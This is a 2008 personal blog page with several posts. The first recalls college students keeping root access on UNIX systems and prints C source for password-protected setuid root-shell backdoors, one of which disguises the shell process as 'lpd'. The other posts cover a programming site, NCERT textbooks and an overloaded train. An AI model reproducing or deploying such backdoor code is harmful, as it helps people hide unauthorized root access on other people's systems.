Sunday, May 18, 2008

Hacking Passwords

There was a time (well, 8-10 years ago when I was in college) when there were many vulnerabilities in common UNIX systems (Sun Solaris/HP-UX/Linux/Digital Unix and what not!) which allowed someone to get superuser (root) privileges.

Normally the college geeks would download some shell script or a C program which would exploit some vulnerability and land you in a shell with '#' prompt and it wasgreat. The geeks stopped here, but the ultra-geeks went further! Using the '#' prompt they created another C program which would just launch a shell and set the "SetUserId" bit on that program.

When such a program is launched by any user, the program is run with root privileges and since it launches a shell you eventually land up with a '#' prompt. To protect the misuse of such program by non-geeks they added a password feature such that the program would first ask for a password and if it matched with the secret password (encoded in the program itself) then it launched the shell.

It worked fine mostly but had few problems. First these ultra-geeks didn't how to hide characters when taking input passwords and that meant somebody could look over their shoulder when they were themselves using this program to get root privileges.

Another problem (which was not well known to some geeks) was that the secret password was itself stored as a string in the program and somebody could see it by opening the program in binary editor. Thanks to "strings" command that we got to hack many such programs.

We found a really smart-ultra-geek who had solved both the problems and whose code of root-shell-launcher was like this:-

#include<stdio.h>
int main()
{
// use termios.h functions to set the terminal in a raw mode
// and disable the character echo - password not visible now
if (getchar() == 'u')
if (getchar() == 'n')
if (getchar() == '1')
if (getchar() == 'c')
if (getchar() == '0')
if (getchar() == 'r')
if (getchar() == 'n')
{
system("/bin/sh"); // launch root shell
return 0;
}
return 1;
}

Getting the password character by character ensures that the binary program will not have any string password like "un1c0rn" hidden in it. Seems pretty smart!

What this guy did not recognize was that it was ultra-easy to crack the password. If at any stage of input the password you enter a wrong character the program exits. This way one can try 36 chars (digits + lower case letters), or more if one wishes to use entire keyboard, and get the first letter of the secret password and in the same way continue to get the subsequent letters of the password.

Thus if the size of input alphabet is 'm' and length of password is 'n', the password can be cracked in 'm * n' attempts whereas the theoretical maximum is 'm^n' attempts. So much for the ingenuity of smart-ultra-geek (with all that termios.h stuff for turning off echo).

A simple solution which we used frequently was this:-

#include<stdio.h>
int main()
{
char *pEncPwd = "qwhDSFer437Tv";
char *salt = "qw";
char input[50], encPwd[13];
strcpy(input, getpass(""));
strncpy(encPwd, crypt(input, salt), 13);
if (strncmp(encPwd, pEncPwd, 13))
{
return 1;
}
else
{
// launch shell
execl("/bin/sh", "lpd", NULL);
}
}

Ignore compilation errors if any in this program (because I don't have any UNIX box with me now), but it works great and solves both problems mentioned earlier using standard library functions. getpass() is used to retrieve text input with echo off and crypt() is used to encrypt using the DES algorithm resulting in a 13 byte encoded password. The program contains the encrypted password in its binary. By the way that "lpd" in execl() is to hide the shell process with the name "lpd".

Programming: Pearls of Wisdom

Recently I happened to visit this great site which contains excellent advice on programming techniques and common pitfalls. Plus its an enjoyable ride. I won't give further details and would let you explore the website yourself.

Thanks to Alex Papadimoulis for "The Daily WTF"!!

Thursday, May 15, 2008

Kudos to NCERT

For those not of the Indian origin, NCERT (National Council of Educational Research and Training) is a government body which publishes textbooks for students upto 12th grade apart from doing 'educational research and training'.

When I was in my high school years (9-12th grade) I enjoyed reading NCERT books. Being quite concise they took less time to study and most of all they were not at all boring like other textbooks (published by non-government publications) which just included solved examples and drill problems.

Well to my utter excitement these NCERT books have improved their standard much beyond what I had seen in my time (1995-1998). First let me remark on the physical design (well, because it is remarkable enough!). These books use color for diagrams to make it more attractive, contain very less misprints, use wide variety of fonts to draw attention, and paper is watermarked with NCERT logo (check their site for logo) to prevent counterfeit copies. And they happen to be quite cheap compared to other textbooks (probably because of government subsidy).

The things which I mention might not seem remarkable to foreigners, but if you actually go to a bookshop and get a textbook (other than NCERT ones) you will find that NCERT books are remarkable for their physical design alone, leave aside their content.

But the reason they have won my heart is primarily because of the content. This summer I had a chance to have a glance at NCERT Mathematics textbook for 9th grade (I pick maths because its my favorite subject and so readers beware! the opinions expressed in this post are primarily based on math texts). The book is really fantastic. These books focus on concept building and not problem solving. You have to read them and not start by working out problems.

The concepts are explained by simple examples, experiments and proofs (where possible) and many explanations contain historical notes or references to related interesting topics. Like while mentioning euclidean geometry they specially mention the history of the 5th postulate (which was the basis of non-euclidean geometries discovered later). And this is exciting enough for a 9th grader.

Now to the real test of a 9th grade book: the introduction to irrationals. Here NCERT goes beyond words and explanations and brings out diagrams in color. The real line is depicted by zooming in various sections to illustrate the concept of denseness. This zooming is by the way perfomed by using the image of a convex lens (commonly called the magnifying glass). What a nice way to express the fact that a small section of the number line is big enough to contain an infinite number of points (which represent numbers).

A point 'A' corresponding to an irrational number will seem to match with a rational point 'B' if you actually do the geometrical constructions. But when you zoom in, you will see that points 'A' and 'B' are different. No matter what rational point 'B' you choose you will be able to zoom the line sufficiently so that point 'A' is different from point 'B'. This zooming in is the essence of 'Mathematical Analysis' and the informal equivalent of espilon-delta.

Unfortunately and shamelessly R. D. Sharma (famous nowadays for IIT-JEE books, although I am not sure he is the same guy) copies these diagrams (its a xerox copy, the same line, the same magnifying glass) and that too in black & white. And it contains lot of examples and problems. Sadly most of the answers to the problems are wrong (printing errors probably), so the student has no way of knowing (apart from his confidence in case he has) whether his answers are correct.

Finally the NCERT book had some appendices discussing the importance of proofs in mathematics. This part is quite well written and is expected to motivate readers to appreciate proofs and develop skills to provide proofs.

Let's congratulate NCERT for bringing out such nice textbooks and hope that they do an even better job in future.

Being Smart - II

Last time I had shown you the brighter side of 'being smart', but I guess its fair only to balance it with the darker side too. The following is an account of what happened to me recently in the presence of smart people.

This time I was traveling from Bokaro to New Delhi by Ranchi Rajdhani Express. I was accompanied by my sister who is currently studying in Delhi. And this was her first visit to Delhi, so I wished that the journey would be enjoyable for her. Alas! This was not going to be the case as I would come to know later.

Anyway I was in a good mood and expected that the journey would meet her expectations (and mine too). Upon boarding the train, the attendant served us with packaged drinking water (this is the first thing these people have for you in Rajdhani express). And it began from here itself. The water was not chilled (well it was at normal temperature for a summer day). And more importantly it was some local grade bottle, not the usual "Rail Neer" made especially for Indian Railways.

My sister promptly objected to this (because other passengers did have 'Rail Neer' which was probably chilled) to which the attendant mentioned that the freezer was not working and the train was overloaded so there were not enough bottles of Rail Neer variety.

The term 'overloaded' gave quite a shock to me because, well, the book says that a Rajdhani Express cannot be overloaded (only confirmed passengers allowed here), but I did not want to create a scene over such a thing as packaged water so I ignored attendant's reply completely and asked my sister to bear with it. After all its India! She was not very comfortable with this treatment, but I ignored that too.

Half an hour later it was time to serve the soup in order to prepare for the dinner. The soup along with soup-sticks is served in a small tray. And in this case I was in real awe! The attendant asked us to share the soup in a single tray because he had probably guessed that we were from the same family. The train is really overloaded man! They don't have packaged water, no trays and what not.

I got damn frustrated and exploded, "What do you want? That we share the soup in same tray, the dinner in same dish, sit on the same seat and sleep on the same berth! What the hell is going on here?" He was taken aback by my rush of adrenaline and gave us separate trays for the soup.

Passengers next us to were trying to calm me down and explained that there is no need to create a fuss over petty things. I was enraged even more. I pointed out that if I am paying Indian Railways every last paise of the fare then I should get every last bit of their service if I want to. And I told that this time it was me, next time it could be you. Well this prediction came true during dinner time!

The attendant was scared way beyond with us so he did not create any issues for us while serving dinner but two passengers next to us did not get their usual 'curd' even when they demanded it twice. The attendant just ignored their request as if he hadn't heard it.

It was really awful. In fact I would say it was my worst journey in Rajdhani for the last three years. I got curious to find out about this strange 'overloading' thing. Before taking a nap on my berth I decided to survey my coach. The AC - 3 Tier coach has space for 64 confirmed passengers and 4-6 RAC passengers. But the survey revealed something really shocking. There were more than 90 passengers in total. On one berth I saw a man, his wife and his son, all sleeping together. There were many such berths. Hey man, the train was really overloaded.

What really happened is that many 'smart' waitlisted passengers bribed their way into the train (through the TTE) and gave the attendant good tip to get the food. The amount of food in the pantry car is such that it can handle 5-10 extra passengers per coach, but handling 20-25 extra people is really out of question. However, because of the heavy tip the attendants had to do something about it. Guess what, they made the confirmed passengers pay for all this nasty stuff.

The whole episode shows the attitude of passengers who are out to do anything to get a seat in Rajdhani. The government is definitely at fault (the TTE could have refused entry to the waitlisted passengers), but the primary fault lies with the people who try to break the rules at any opportunity thinking that they are too clever.

The moral of the story is: Don't try to get more than what you deserve. Sometimes you will be on the winning side by being smart, but at other times you could lose because someone turned out to be way smarter or just because of plain bad luck. If people choose to play by the rules then it will automatically discourage miscreants who try to take advantage by trying to get more than what they deserve.

For people who are yelling, "Why do people keep telling us about problems but not solutions?" I only need to repeat what I said earlier:

"Being smart is not about fooling people, but about doing things a better way (efficient, economical etc.) compared to others. When you bribe someone you are not actually being smart, but you are committing a legal crime."